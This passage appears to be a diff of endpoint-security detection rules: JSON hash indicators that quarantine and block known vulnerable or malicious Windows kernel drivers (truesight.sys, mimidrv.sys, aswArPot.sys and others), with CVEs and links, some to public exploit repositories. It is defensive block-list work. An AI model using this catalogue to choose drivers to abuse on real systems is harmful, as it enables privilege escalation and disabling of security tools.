+ "hl_testing_start_time": "2026-03-23T11:45:29.973032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9679758455c69877fce866267d60c39d108b495dca183954e4af869902965b3d",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f87e8c6f-d909-5ba6-bcfb-90c512429a89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816174Z",
+ "creation_date": "2026-03-23T11:45:30.816175Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0c52425dd90f36d110952c665e5b644bb1092f952942c07bb4da998c9ce6e5b",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8817a8c-2f14-5305-a925-839a0d3d0afb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829995Z",
+ "creation_date": "2026-03-23T11:45:31.829997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec0bf9819b63141cdf8f24415648a234ac220e28fa801c330a6bc9f954ee411c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f88e348a-46c6-54b5-9941-1f945fb3429c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155575Z",
+ "creation_date": "2026-03-23T11:45:31.155577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4add50747f10a3e9aceba7e52b26c4af95bebdfabfa5c9b5a10ed31adb8af823",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f88f0493-5201-598b-ae0a-9ae0d9d84321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975394Z",
+ "creation_date": "2026-03-23T11:45:29.975396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddc5ff33a19baf1630a92723b5d0103fcc9ca58ee2a548526b9439eec3c97fe8",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8933aca-9712-50c8-8158-dafe3d71bc7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618531Z",
+ "creation_date": "2026-03-23T11:45:29.618533Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cee638c546efe5bd23880da9fa2b90e8dd0fd4a228fb0ad96f6c11d47a52593",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f89e0881-d4b5-58c8-ac08-863426404a29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612439Z",
+ "creation_date": "2026-03-23T11:45:29.612441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecfc52a22e4a41bf53865b0e28309411c60af34a44e31a5c53cdc8c5733e8282",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8ade152-b018-5723-b95e-7d67d90d09de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474021Z",
+ "creation_date": "2026-03-23T11:45:31.474025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cc38edb6d2a12869cef4dbee74e8316f0df610b74fe26728094188c66eaa6cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8af7b62-56d6-59f7-98eb-92799aefc91e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829184Z",
+ "creation_date": "2026-03-23T11:45:30.829186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de4328d64c16df3d425ccd79c294016369784b8662a1de7891dfba556c720469",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8b0064e-c84a-56f1-861b-74bb4798413d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617678Z",
+ "creation_date": "2026-03-23T11:45:29.617679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "126719d008d106b7100ae47ed47666c1334701bd7ddb32d5b8e84048f258700f",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8cccdc4-ced6-5e08-a26d-249f38049ab3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825423Z",
+ "creation_date": "2026-03-23T11:45:31.825425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "920b06859bfcff7484bf2a20d876bbcf1a6d65f8c72050afa388848ad01767e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8ce1ea4-9aab-502e-a73e-337ec869c3ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827525Z",
+ "creation_date": "2026-03-23T11:45:30.827527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3f8afc10771d473f9188d36e035bf96df394cb381c3f18b319f69f8648750e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8d1c31e-cdf4-54c7-a616-4787ff155945",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452515Z",
+ "creation_date": "2026-03-23T11:45:30.452518Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e42d8953f90e0b052adacd6c8e6cc240d723e5b4605ac897fe9667e661f9ed3c",
+ "comment": "Malicious Kernel Driver (aka c94f405c5929cfcccc8ad00b42c95083.sys) [https://www.loldrivers.io/drivers/ddefecdd-9410-46d9-8957-e23aac1aba0c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8d5b631-b174-53a1-accb-b55aaea18795",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821926Z",
+ "creation_date": "2026-03-23T11:45:31.821928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5fdf37acbd3e79bd58b41fb62b2f280d6a6c969b218ecab4bb279299f61adfd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8d8a329-d8e0-55a6-bdf0-f20da286c3d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479457Z",
+ "creation_date": "2026-03-23T11:45:30.479459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1d2d76829640542eabc0c96356675c0a930e4607869de8037daf62f898903b5",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8e45fc2-199e-5572-8624-ec1271d6285f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968421Z",
+ "creation_date": "2026-03-23T11:45:29.968423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cda1a6e33d14d5dd06344425102bf840f8149e817ecfb01c59a2190d3367024",
+ "comment": "Ours Technology Inc. Dangerous I/O Driver (aka otipcibus64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8e6ff44-980c-565d-8ae3-23e7e3eec757",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497615Z",
+ "creation_date": "2026-03-23T11:45:31.497617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6aa0d21b1220237c2fb7d857edca84352fc11a8b177a33344e54c1037e064d20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8e914cd-392d-5ffc-928c-3423d653b97b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480558Z",
+ "creation_date": "2026-03-23T11:45:31.480562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8ae1c8e388b120b3ac6bb84d2b3d3b032e683f79281360a2cbfbcb3107e3f96",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8f0ca2c-dab8-5590-b2f7-8e4356626c4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616256Z",
+ "creation_date": "2026-03-23T11:45:29.616257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6ae7364fd188c10d6b5a729a7ff58a3eb11e7feb0d107d18f9133655c11fb66",
+ "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8fe3526-971b-53c4-90d5-846568f51a6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970211Z",
+ "creation_date": "2026-03-23T11:45:29.970213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72f100edc998bb2fc40a3a7e7d76c6c37f7173b812f5cd7ae62c824b3fc63d57",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9031162-1e09-5420-84da-72885ee0bd62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463327Z",
+ "creation_date": "2026-03-23T11:45:30.463330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6157e033a12520c73dcedf8e49cd42d103e5874c34d6527bb9de25a5d26e5ad",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f9042b32-c4ee-505e-bfef-95b727c438ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468167Z",
+ "creation_date": "2026-03-23T11:45:30.468171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e521e54a1e5a03abaae405b58a84758058f3fac5e8cd8a370f232c7dc7bb164",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f907231c-550b-5cd2-9a65-5a074c96c423",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481134Z",
+ "creation_date": "2026-03-23T11:45:31.481138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
